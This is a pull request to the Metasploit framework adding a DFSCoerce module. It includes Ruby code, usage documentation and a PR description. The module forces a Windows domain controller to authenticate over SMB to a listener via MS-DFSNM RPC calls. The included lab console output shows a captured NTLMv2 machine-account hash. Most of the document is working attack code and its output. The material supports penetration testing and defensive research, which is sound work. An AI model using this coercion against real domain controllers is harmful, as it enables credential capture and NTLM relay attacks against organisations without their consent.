### PR TITLE
Add the dfscoerce module

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -427,7 +427,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.5)
+    ruby_smb (3.1.6)
       bindata
       openssl-ccm
       openssl-cmac

--- a/documentation/modules/auxiliary/scanner/dcerpc/dfscoerce.md
+++ b/documentation/modules/auxiliary/scanner/dcerpc/dfscoerce.md
@@ -1,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```

--- a/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
+++ b/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
@@ -89,6 +89,9 @@ class MetasploitModule < Msf::Auxiliary
     rescue RubySMB::Dcerpc::Error::DfsnmError => e
       win32_error = ::WindowsError::Win32.find_by_retval(e.error_status).first
       case win32_error
+      when ::WindowsError::Win32::ERROR_ACCESS_DENIED
+        # this should be the response even if LISTENER captured the credentials (MSF, Responder, etc.)
+        print_good('Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful')
       when ::WindowsError::Win32::ERROR_BAD_NETPATH
         # this should be the response even if LISTENER was inaccessible
         print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')

--- a/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
+++ b/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
 
   Dfsnm = RubySMB::Dcerpc::Dfsnm
 
-  METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRootResponse].freeze
+  METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRoot].freeze
 
   def initialize
     super(

--- a/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
+++ b/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'windows_error'
+require 'ruby_smb'
+require 'ruby_smb/error'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Auxiliary::Scanner
+
+  Dfsnm = RubySMB::Dcerpc::Dfsnm
+
+  METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRootResponse].freeze
+
+  def initialize
+    super(
+      'Name' => 'DFSCoerce',
+      'Description' => %q{
+        Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+      },
+      'Author' => [
+        'Wh04m1001',
+        'xct_de',
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]
+      ],
+      'License' => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),
+        OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])
+      ]
+    )
+  end
+
+  def connect_dfsnm
+    vprint_status('Connecting to Distributed File System (DFS) Namespace Management Protocol')
+    netdfs = @tree.open_file(filename: 'netdfs', write: true, read: true)
+
+    vprint_status('Binding to \\netdfs...')
+    netdfs.bind(endpoint: RubySMB::Dcerpc::Dfsnm)
+    vprint_good('Bound to \\netdfs')
+
+    netdfs
+  end
+
+  def run_host(_ip)
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      dfsnm = connect_dfsnm
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    begin
+      case datastore['METHOD']
+      when 'NetrDfsAddStdRoot'
+        dfsnm.netr_dfs_add_std_root(datastore['LISTENER'], 'share', comment: Faker::Hacker.say_something_smart)
+      when 'NetrDfsRemoveStdRoot', 'Automatic'
+        # use this technique by default, it's the original and doesn't require a comment
+        dfsnm.netr_dfs_remove_std_root(datastore['LISTENER'], 'share')
+      end
+    rescue RubySMB::Dcerpc::Error::DfsnmError => e
+      win32_error = ::WindowsError::Win32.find_by_retval(e.error_status).first
+      case win32_error
+      when ::WindowsError::Win32::ERROR_BAD_NETPATH
+        # this should be the response even if LISTENER was inaccessible
+        print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')
+      when nil
+        print_status("Server responded with unknown error: 0x#{error_status.to_s(16).rjust(8, '0')}")
+      else
+        print_status("Server responded with #{win32_error.name} (#{win32_error.description})")
+      end
+    end
+  end
+end


### PR DESCRIPTION
This adds a Metasploit module for the new [DFSCoerce](https://github.com/Wh04m1001/DFSCoerce/blob/main/dfscoerce.py) technique for forcing an authentication attempt on an affected server. This is very similar to petitpotam (which has been patched in various ways a couple of times). It can be used to capture the Net-NTLM credentials of the machine account which isn't particularly useful, but the trigger can also be with other relaying tools outside of Metasploit just like petitpotam could.

Unlike petitpotam, from what I've observed during my testing, this module *does* require authentication in order to work. A standard domain user however is sufficient to trigger the authentication attempt. There is no CVE assigned to this as far as I'm aware.

Requires rapid7/ruby_smb#233.

## Verification

- [ ]  Start msfconsole
- [ ]  Do: `use auxiliary/scanner/dcerpc/dfscoerce`
- [ ]  Set the `RHOSTS` and `LISTENER` options
- [ ]  Set the `SMBUser`, `SMBPass` for authentication
- [ ]  Set the `METHOD` options to adjust the trigger vector
    - [ ] Try the module with `NetrDfsAddStdRoot`
    - [ ] Try the module with `NetrDfsRemoveStdRoot`
- [ ]  Do: `run`

## Example

```
msf6 > use auxiliary/server/capture/smb 
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) > 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.

msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run

[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445    - Binding to \netdfs...
[+] 192.168.159.96:445    - Bound to \netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.250.237
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000

[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >
```